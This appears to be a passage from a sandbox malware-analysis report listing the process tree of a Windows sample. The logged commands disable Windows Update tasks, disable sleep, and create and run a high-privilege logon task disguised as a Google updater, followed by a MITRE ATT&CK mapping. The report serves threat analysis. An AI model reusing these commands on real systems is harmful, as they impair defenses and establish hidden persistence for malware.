      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      PID:1900
      C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      PID:2380
      C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      PID:2576
      C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      PID:1992
      C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      PID:2272
      C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      PID:2360
      C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      PID:740
    C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Power Settings
    - Suspicious use of WriteProcessMemory
    PID:2784
      C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID:2648
      C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID:2296
      C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID:2792
      C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID:2652
    C:\Windows\System32\conhost.exe
    C:\Windows\System32\conhost.exe
    - Drops file in Windows directory
    PID:1936
    C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""
    PID:2416
      C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""
      - Scheduled Task/Job: Scheduled Task
      PID:1444
    C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
    PID:2516
      C:\Windows\system32\schtasks.exe
      schtasks /run /tn "GoogleUpdateTaskMachineQC"
      PID:2228
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "49384658016723260351945230819-2035182398-168646351216807987814174275551674409703"
PID:828
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1210583900-1864933382-504099959169151827521131715211941224944-15666506011230839723"
PID:1476
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1302879950-840085889-702871329-800904320-2583387719883909082086569638-984941914"
PID:2152
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1715209253-1549303545-2018470893-1593325933-1324999412-740847104-1082938555-1032977077"
- Suspicious use of SetWindowsHookEx
PID:2696
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "227570323-1575764454-14458156771985709915-1950362717-886438917-12731077391047296245"
- Suspicious use of SetWindowsHookEx
PID:2988
Network
MITRE ATT&CK Enterprise v15
Execution
- Scheduled Task/Job 1
  - Scheduled Task 1
- System Services 1
  - Service Execution 1
Persistence
- Boot or Logon Autostart Execution 1
  - Registry Run Keys / Startup Folder 1
- Create or Modify System Process 2
  - Windows Service 2
- Power Settings 1
- Scheduled Task/Job 1
  - Scheduled Task 1
Privilege Escalation
- Boot or Logon Autostart Execution 1
  - Registry Run Keys / Startup Folder 1
- Create or Modify System Process 2
  - Windows Service 2
- Scheduled Task/Job 1
  - Scheduled Task 1
Defense Evasion
- File and Directory Permissions Modification 1
- Impair Defenses 1
- Modify Registry 3
- Obfuscated Files or Information 1
  - Command Obfuscation 1
Downloads